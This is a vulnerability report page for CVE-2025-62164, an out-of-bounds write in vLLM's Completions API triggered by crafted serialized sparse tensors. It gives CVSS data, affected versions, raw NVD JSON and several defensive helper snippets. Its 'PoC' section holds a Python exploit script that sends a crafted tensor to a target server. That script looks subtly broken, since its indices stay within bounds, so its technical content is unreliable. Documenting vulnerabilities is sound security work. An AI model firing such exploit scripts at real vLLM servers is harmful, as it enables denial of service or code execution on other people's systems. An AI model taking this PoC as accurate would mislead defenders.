Security Vulnerability Report
CVE-2025-62164 CVSS 8.8 HIGH

CVE-2025-62164

Published: 2025-11-21 02:15:43
Last Modified: 2025-12-04 17:14:21

Description

vLLM is an inference and serving engine for large language models (LLMs). In versions from 0.10.2 up to, but not including, 0.11.1, the Completions API endpoint contains a memory corruption vulnerability that can crash the server (denial of service) and may allow remote code execution (RCE). When processing user-supplied prompt embeddings, the endpoint loads serialized tensors with torch.load() without sufficient validation. Because of a change introduced in PyTorch 2.8.0, sparse tensor integrity checks are disabled by default. As a result, a maliciously crafted tensor can bypass internal bounds checks and trigger an out-of-bounds memory write during the call to to_dense(). This memory corruption can crash vLLM and potentially lead to code execution on the server hosting vLLM. The issue is patched in version 0.11.1.
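The kind of integrity check described above can be illustrated without PyTorch. The sketch below is a pure-Python stand-in, not vLLM's or PyTorch's actual code: it models a 2-D COO sparse tensor as per-dimension index rows plus a declared shape, and refuses to densify when any index falls outside that shape. The names `validate_coo_indices` and `to_dense_checked` are hypothetical and exist only for this example.

```python
from typing import List, Sequence


def validate_coo_indices(indices: Sequence[Sequence[int]], shape: Sequence[int]) -> None:
    """Raise ValueError if any COO index lies outside the declared shape."""
    if len(indices) != len(shape):
        raise ValueError("indices must have exactly one row per dimension")
    nnz = len(indices[0]) if indices else 0
    for dim, (row, extent) in enumerate(zip(indices, shape)):
        if len(row) != nnz:
            raise ValueError("all index rows must have the same length")
        for idx in row:
            if not 0 <= idx < extent:
                raise ValueError(
                    f"index {idx} out of bounds for dimension {dim} (size {extent})"
                )


def to_dense_checked(
    indices: Sequence[Sequence[int]],
    values: Sequence[float],
    shape: Sequence[int],
) -> List[List[float]]:
    """Densify a 2-D COO tensor, but only after its indices pass validation."""
    if len(shape) != 2:
        raise ValueError("this sketch only handles 2-D tensors")
    validate_coo_indices(indices, shape)
    if len(values) != len(indices[0]):
        raise ValueError("values and indices must describe the same number of entries")
    dense = [[0.0] * shape[1] for _ in range(shape[0])]
    # Without the validation above, an out-of-range (row, col) pair here is the
    # pure-Python analogue of the out-of-bounds write described in the advisory.
    for row, col, value in zip(indices[0], indices[1], values):
        dense[row][col] += value  # duplicate coordinates are summed, as in COO
    return dense
```

In PyTorch itself, the comparable checks can be switched on with `torch.sparse.check_sparse_tensor_invariants`; the patch listed in the record's references is the authoritative source for how vLLM actually addressed the issue.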

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
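The 8.8 score follows from the vector string. As a rough sketch, the CVSS v3.1 base-score equations can be applied as follows; the metric weights are those of the CVSS v3.1 specification, while the function name `cvss31_scores` and the one-decimal rounding of the two sub-scores are choices made for this example.

```python
import math

# Metric weights from the CVSS v3.1 specification.
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "UI": {"N": 0.85, "R": 0.62},
    "CIA": {"H": 0.56, "L": 0.22, "N": 0.0},
}
PR_UNCHANGED = {"N": 0.85, "L": 0.62, "H": 0.27}
PR_CHANGED = {"N": 0.85, "L": 0.68, "H": 0.5}


def roundup(value: float) -> float:
    """Round up to one decimal place, as defined in the CVSS v3.1 specification."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def cvss31_scores(vector: str):
    """Return (base, exploitability, impact) for a CVSS v3.1 base vector."""
    prefix, *parts = vector.split("/")
    if prefix != "CVSS:3.1":
        raise ValueError("only CVSS:3.1 vectors are handled in this sketch")
    m = dict(part.split(":") for part in parts)
    changed = m["S"] == "C"
    pr = (PR_CHANGED if changed else PR_UNCHANGED)[m["PR"]]
    cia = WEIGHTS["CIA"]
    iss = 1 - (1 - cia[m["C"]]) * (1 - cia[m["I"]]) * (1 - cia[m["A"]])
    if changed:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    else:
        impact = 6.42 * iss
    exploitability = (
        8.22 * WEIGHTS["AV"][m["AV"]] * WEIGHTS["AC"][m["AC"]] * pr * WEIGHTS["UI"][m["UI"]]
    )
    if impact <= 0:
        base = 0.0
    elif changed:
        base = roundup(min(1.08 * (impact + exploitability), 10))
    else:
        base = roundup(min(impact + exploitability, 10))
    return base, round(exploitability, 1), round(impact, 1)


print(cvss31_scores("CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"))
```

For this CVE's vector the three values agree with the baseScore, exploitabilityScore, and impactScore fields in the raw record.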

Configurations (Affected Products)

cpe:2.3:a:vllm:vllm:*:*:*:*:*:*:*:* (versions from 0.10.2 up to, but not including, 0.11.1) - VULNERABLE
cpe:2.3:a:vllm:vllm:0.11.1:rc0:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:vllm:vllm:0.11.1:rc1:*:*:*:*:*:* - VULNERABLE
vLLM 0.10.2 through 0.11.0
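To check an installed version against the affected range, something like the following minimal sketch could be used. It assumes version strings of the form `X.Y.Z` or `X.Y.ZrcN`; the function name `is_affected` is hypothetical, and only the 0.11.1 release candidates listed above (rc0 and rc1) are treated as vulnerable.

```python
import re

_VERSION_RE = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)(?:rc(\d+))?$")

RANGE_START = (0, 10, 2)  # first affected release (inclusive)
RANGE_END = (0, 11, 1)    # first fixed release (exclusive)


def is_affected(version: str) -> bool:
    """Return True if a vLLM version string falls in the range listed for this CVE."""
    match = _VERSION_RE.match(version.strip())
    if match is None:
        raise ValueError(f"unrecognised version string: {version!r}")
    release = tuple(int(match.group(i)) for i in (1, 2, 3))
    rc = match.group(4)

    if release == RANGE_END:
        # The final 0.11.1 release is fixed; the record lists only rc0 and rc1.
        return rc is not None and int(rc) in (0, 1)

    # Sort key: a release candidate orders just before its final release.
    key = (release, 0 if rc is not None else 1, int(rc) if rc is not None else 0)
    return (RANGE_START, 1, 0) <= key < (RANGE_END, 1, 0)


for v in ("0.10.1", "0.10.2", "0.11.0", "0.11.1rc1", "0.11.1"):
    print(v, is_affected(v))
```

A real deployment check would more likely rely on a full version parser; the hand-rolled regex here only keeps the example free of third-party dependencies.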

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62164 PoC - Malicious Sparse Tensor Trigger
import torch
import requests
import io


def create_malicious_sparse_tensor():
    """
    Create a malicious sparse tensor designed to trigger
    OOB write during to_dense() conversion
    """
    # Create a sparse tensor with manipulated indices
    indices = torch.tensor([[0, 0, 0], [0, 1, 2]], dtype=torch.long)
    values = torch.tensor([1.0, 2.0, 3.0], dtype=torch.float32)

    # Craft sparse tensor with invalid size that bypasses checks
    size = (1, 1000000000)  # Intentionally large dimension
    sparse_tensor = torch.sparse_coo_tensor(indices, values, size)

    # Serialize to bytes (this is what gets sent to the server)
    buffer = io.BytesIO()
    torch.save(sparse_tensor, buffer)
    return buffer.getvalue()


def exploit_vllm(target_url):
    """
    Exploit vLLM CVE-2025-62164
    """
    malicious_data = create_malicious_sparse_tensor()

    # Prepare the request to Completions API
    payload = {
        'model': 'meta-llama/Llama-2-7b-hf',
        'prompt': 'test',
        'max_tokens': 100,
        'prompt_embeddings': malicious_data.hex()  # Send serialized tensor
    }

    try:
        response = requests.post(
            f'{target_url}/v1/completions',
            json=payload,
            timeout=30
        )
        print(f'Status: {response.status_code}')
        print(f'Response: {response.text}')
    except Exception as e:
        print(f'Error: {e}')


if __name__ == '__main__':
    target = 'http://target-vllm-server:8000'
    exploit_vllm(target)

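References

https://github.com/vllm-project/vllm/commit/58fab50d82838d5014f4a14d991fdb9352c9c84b - Patch
https://github.com/vllm-project/vllm/pull/27204 - Issue Tracking, Patch, Vendor Advisory
https://github.com/vllm-project/vllm/security/advisories/GHSA-mrw7-hf4f-83pf - Issue Tracking, Vendor Advisory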

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62164", "sourceIdentifier": "[email protected]", "published": "2025-11-21T02:15:43.193", "lastModified": "2025-12-04T17:14:20.630", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "vLLM is an inference and serving engine for large language models (LLMs). From versions 0.10.2 to before 0.11.1, a memory corruption vulnerability could lead to a crash (denial-of-service) and potentially remote code execution (RCE), exists in the Completions API endpoint. When processing user-supplied prompt embeddings, the endpoint loads serialized tensors using torch.load() without sufficient validation. Due to a change introduced in PyTorch 2.8.0, sparse tensor integrity checks are disabled by default. As a result, maliciously crafted tensors can bypass internal bounds checks and trigger an out-of-bounds memory write during the call to to_dense(). This memory corruption can crash vLLM and potentially lead to code execution on the server hosting vLLM. This issue has been patched in version 0.11.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-123"}, {"lang": "en", "value": "CWE-502"}, {"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vllm:vllm:*:*:*:*:*:*:*:*", "versionStartIncluding": "0.10.2", "versionEndExcluding": "0.11.1", "matchCriteriaId": "257F44B9-5BDF-4A61-B7B9-A901DD438F9C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vllm:vllm:0.11.1:rc0:*:*:*:*:*:*", "matchCriteriaId": "FEE054E1-1F84-4ACC-894C-D7E3652EF1B1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vllm:vllm:0.11.1:rc1:*:*:*:*:*:*", "matchCriteriaId": "B05850DF-38FE-439F-9F7A-AA96DA9038CC"}]}]}], "references": [{"url": "https://github.com/vllm-project/vllm/commit/58fab50d82838d5014f4a14d991fdb9352c9c84b", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/vllm-project/vllm/pull/27204", "source": "[email protected]", "tags": ["Issue Tracking", "Patch", "Vendor Advisory"]}, {"url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-mrw7-hf4f-83pf", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}]}}
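A record in this shape can be consumed programmatically. The sketch below embeds a trimmed copy of the record (fields not needed for the example are omitted) and pulls out the vulnerable CPE ranges and the references carrying a given tag. The helper names `vulnerable_ranges` and `references_with_tag` are hypothetical; the key names are those visible in the raw JSON.

```python
import json

# Trimmed copy of the record above; only the fields used below are kept.
RECORD = json.loads("""
{"cve": {"id": "CVE-2025-62164",
 "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [
   {"vulnerable": true, "criteria": "cpe:2.3:a:vllm:vllm:*:*:*:*:*:*:*:*",
    "versionStartIncluding": "0.10.2", "versionEndExcluding": "0.11.1"},
   {"vulnerable": true, "criteria": "cpe:2.3:a:vllm:vllm:0.11.1:rc0:*:*:*:*:*:*"},
   {"vulnerable": true, "criteria": "cpe:2.3:a:vllm:vllm:0.11.1:rc1:*:*:*:*:*:*"}]}]}],
 "references": [
   {"url": "https://github.com/vllm-project/vllm/commit/58fab50d82838d5014f4a14d991fdb9352c9c84b",
    "tags": ["Patch"]},
   {"url": "https://github.com/vllm-project/vllm/pull/27204",
    "tags": ["Issue Tracking", "Patch", "Vendor Advisory"]},
   {"url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-mrw7-hf4f-83pf",
    "tags": ["Issue Tracking", "Vendor Advisory"]}]}}
""")


def vulnerable_ranges(record: dict) -> list:
    """List (criteria, start_inclusive, end_exclusive) for each vulnerable CPE match."""
    ranges = []
    for config in record["cve"].get("configurations", []):
        for node in config.get("nodes", []):
            for match in node.get("cpeMatch", []):
                if match.get("vulnerable"):
                    ranges.append((
                        match["criteria"],
                        match.get("versionStartIncluding"),  # None when absent
                        match.get("versionEndExcluding"),    # None when absent
                    ))
    return ranges


def references_with_tag(record: dict, tag: str) -> list:
    """Return the URLs of all references that carry the given tag."""
    return [
        ref["url"]
        for ref in record["cve"].get("references", [])
        if tag in ref.get("tags", [])
    ]


for criteria, start, end in vulnerable_ranges(RECORD):
    print(criteria, start, end)
print(references_with_tag(RECORD, "Patch"))
```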